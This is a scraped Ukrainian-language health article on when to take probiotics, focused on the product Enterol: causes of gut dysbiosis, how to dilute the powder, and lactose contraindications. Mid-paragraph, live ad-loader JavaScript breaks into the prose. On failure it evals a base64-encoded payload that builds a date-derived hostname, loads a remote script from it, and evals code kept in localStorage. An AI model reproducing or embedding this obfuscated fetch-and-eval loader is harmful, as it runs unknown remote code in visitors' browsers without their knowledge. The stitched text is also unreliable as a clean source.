Коли потрібен пробіотик?

Людська травна система має безліч прихованих таємниць, які вчені протягом останнього часу активно намагаються дослідити. Одна з таких таємниць — мікрофлора кишківника. На сьогодні вже відомо, що у кожної людини вона неповторна, майже як відбитки пальців. Її формування відбувається на основі харчових уподобань людини. При цьому в нормі склад мікроорганізмів у кишківнику змінюється лише на 1–2%, що вказує на його високу стабільність.

Кількість бактерій, які “проживають” в кишківнику також дивовижна — близько 50 трлн. Це число майже в півтора раза перевищує кількість всіх клітин людського тіла. Для чого все це знати? В першу чергу для того, щоб усвідомити, наскільки важливо підтримувати баланс мікрофлори кишківника. У цьому може допомогти як правильне харчування, так і спеціальні засоби, до яких належать пробіотики.

Що шкодить мікрофлорі кишківника?

Далеко не завжди лише один фактор призводить до дисбалансу мікроорганізмів в ШКТ. Доволі часто чинники між собою поєднуються, через що стає важко визначити причину захворювання. Здебільшого на чисельність нормальних бактерій негативно впливає:

порушення обміну речовин в організмі;активне збільшення кількості патогенних бактерій;недостатня перистальтика в дванадцятипалій та тонкому відділі кишківника;запалення або інші деструктивні ураження епітелію ШКТ;поява лімфоподібних утворень;зміна pH в шлунку.

До факторів, які сприяють розвитку дисбалансу мікрофлори, належать вживання алкоголю, неправильне харчування або занадто сувора дієта. Також отруєння чи зараження гельмінтами вносить негативні корективи. Якщо усунути причину і почати вживання необхідних заходів, наприклад використовувати Ентерол 250, інструкція якого якраз містить відповідні показання, тоді можна швидко покращити самопочуття. Проте в жодному разі не займайтесь самолікуванням і попередньо зверніться до лікаря.

Як правильно застосовувати пробіотик?

Інструкція до Ентеролу радить розводити порошок з пробіотиком теплою водою, температури не вище 50 градусів, або використовувати капсули запиваючи рідиною. Інакше живі мікроорганізми, які входять до складу засобу, будуть нейтралізовані. Також під час деяких захворювань показана регідратація. Частіше всього вона призначається при діареї. В залежності від ступеня важкості цього ускладнення рідину можуть вводити внутрішньовенно або перорально. Подібне лікування пробіотик не може замінити, тому за необхідності варто застосовувати як одне, так і друге. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Деякі пробіотики можуть у своєму складі містити лактозу. В таких випадках вживання протидіарейного засобу не рекомендується при:

глюкозогалактозній недостатності;спадковій нестерпності галактози;нестачі лактози.

Сьогодні пробіотики часто сприймають як харчові добавки. Насправді деякі препарати проходять повноцінні клінічні дослідження, що їх ставить в один ряд з іншими медичними засобами.

Якщо після декількох діб використання пробіотика не відмічено покращення, або навпаки стало погіршуватись самопочуття, потрібно звернутись за медичною допомогою.

Потрібно пам’ятати, що перед використанням будь-якого медикаменту варто попередньо проконсультуватися із лікарем і в жодному разі не займатись самолікуванням. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/koli-potriben-probiotik/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top